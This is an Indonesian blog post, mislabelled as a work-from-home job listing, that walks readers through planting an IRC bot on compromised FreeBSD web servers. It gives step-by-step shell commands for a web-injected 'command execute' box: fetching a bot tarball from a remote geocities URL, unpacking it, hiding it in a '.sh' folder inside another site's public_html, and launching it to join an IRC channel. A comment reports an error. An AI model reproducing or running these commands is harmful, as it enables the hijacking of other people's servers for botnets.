lowongan kerja di rumah
Sabtu, 31 Mei 2008 di 14.22 |  
.
.
.
.
Kali ini saya ( dohhh..formal bangedd seeechh.. !! ) ..

Kali ini gw akan coba berikan sedikit yg gw tau ttg nge-buat bot yang untuk FreeBSD. Dan masih tetep dengan inject-an tentunya .

Berhubung gw dah ngantuk jadi agak dipercepat aja yaa...

caranya hampir sama kek yg buat linux . Dah tau dunkzz !! kalo yg blon tau N mau baca yg buat linux silahkan lihat disini .

langsung aja yaa.. dah mau adzan subuh nihh...

1. fetch http://www.geocities.com/wisnu_amanda/botBsd.tgz ketik kedalam command
execute, kemudian klik execute

2. tar zxfv botBsd.tgz ketik kedalam command execute, kemudian klik execute

3. rm -fr botBsd.tgz ketik kedalam command execute, kemudian klik execute

4.

a. Tambahin change directory dengan : /.sh contoh :
/home/muveszet/public_html/spaw/imagesszobor/.sh

b. ./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner) contoh :

./nadya a.txt bangkee noe 193.224.55.172 lampunk wisnoee ketik kedalam command
execute, kemudian klik execute

5. ./dssl a.txt ketik kedalam command execute, kemudian klik execute

6. Selesai ! . Silahkan tunggu bot kamu join

Cara nya hampir sama kowq dengan buat bot buat di linux ... kalo mo tau lebih detill nya lihat disini

Selamat Mencobaaa !!!


Saya hanya mencoba memberikan apa yg telah saya
pelajari, lakukan, buktikan. tidak ada niat untuk menggurui. saya buat yg
semudah2 nya agar teman2 yg baru belajar tidak kesulitan memahaminya.

selamat mencoba, you can do it !

Diposting oleh Admin Label:

1 komentar:

Anonim mengatakan...

ELF binary type "0" not known.
./xh: 1: Syntax error: "(" unexpected

kok muncul seperti ini bang!! mohon petunjuk

19 Maret 2009 pukul 20.08  






Klik Iklan Sih... Beramal Dikit Napa... hehehe..
Thanks To :
"Thanks ya atas kunjungannya

Ini cuma blog asal2an, asal jadi
Mohon maaf jika ada yang tidak
Berkenan dihati

Mohon Tinggalkan pesan
Di Box yang tersedia
Insya Allah saya akan melakukan
linkback ke blog kamu.

Terima kasih

********

wisnoee